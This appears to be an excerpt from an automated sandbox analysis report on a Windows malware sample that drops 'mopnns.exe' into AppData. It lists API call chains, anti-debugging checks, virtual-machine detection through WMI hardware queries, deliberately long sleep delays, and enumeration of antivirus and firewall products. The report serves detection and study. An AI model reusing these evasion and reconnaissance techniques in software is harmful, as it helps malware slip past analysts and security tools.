Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0041C50E push cs; iretd
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_004231C8 push eax; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0040E21D push ecx; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0041C6BE push ebx; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020A4AD0 push edi; retf
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020A1B85 push FFFFFFE1h; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020A49C3 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020EC10E push ebx; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020EBE5C push cs; iretd
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020EBF5E push cs; iretd
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020DE46D push ecx; ret

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_0046A020 LoadLibraryW,GetProcAddress,FreeLibrary,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetSysColor,SendMessageW,

Source: initial sample	Static PE information: section name: .text entropy: 7.81616488491
Source: initial sample	Static PE information: section name: .text entropy: 7.90234936843

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File created: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Jump to dropped file

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004630C0 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0047A090 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0047A1D0 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00439180 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,GetModuleHandleW,GetProcAddress,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0046A240 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004663F0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004663F0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0043D4F0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0043A490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0043C660 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00477760 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004777C0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\VYeSXonMT1.exe TID: 7124	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe TID: 2976	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe TID: 4696	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Window / User API: threadDelayed 3068
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Window / User API: threadDelayed 2962

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.0.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: VYeSXonMT1.exe, 00000000.00000002.405995459.00000000020CD000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWen-USn"
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: VYeSXonMT1.exe, 00000000.00000002.405947019.0000000002086000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405995459.00000000020CD000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: mopnns.exe, 00000004.00000002.480909790.0000000005A05000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware9TGWZTFXWin32_VideoControllerW4PSMW52VideoController120060621000000.000000-00049705532display.infMSBDA853EF93NPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBRYK4S2G2c1dfad63d745d6f
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\e
Source: mopnns.exe, 00000004.00000003.467157538.00000000007B5000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468119983.00000000007B5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004770E0 FindFirstFileW,FindClose,GetFileAttributesW,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00477170 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00444070 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004443B0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_0046A020 LoadLibraryW,GetProcAddress,FreeLibrary,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetSysColor,SendMessageW,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020A0083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D0D90 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004966B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_0049C54E __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004981F2 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004966B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_004123F1 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020DD059 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020DE86C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020E71BA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020E2641 SetUnhandledExceptionFilter,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00412300 keybd_event,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004122A0 mouse_event,

Source: VYeSXonMT1.exe	Binary or memory string: Program Manager
Source: VYeSXonMT1.exe	Binary or memory string: Shell_TrayWnd
Source: VYeSXonMT1.exe	Binary or memory string: Progman
Source: VYeSXonMT1.exe, 00000000.00000002.405504382.00000000004B2000.00000040.00020000.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Language, Device and Operating System Detection:

Yara detected Evader

Show sources

Source: Yara match	File source: 0.2.VYeSXonMT1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VYeSXonMT1.exe PID: 6972, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004760E0 SystemTimeToFileTime,SystemTimeToFileTime,GetSystemTimeAsFileTime,FileTimeToLocalFileTime,SystemTimeToFileTime,GetSystemTimeAsFileTime,FileTimeToLocalFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
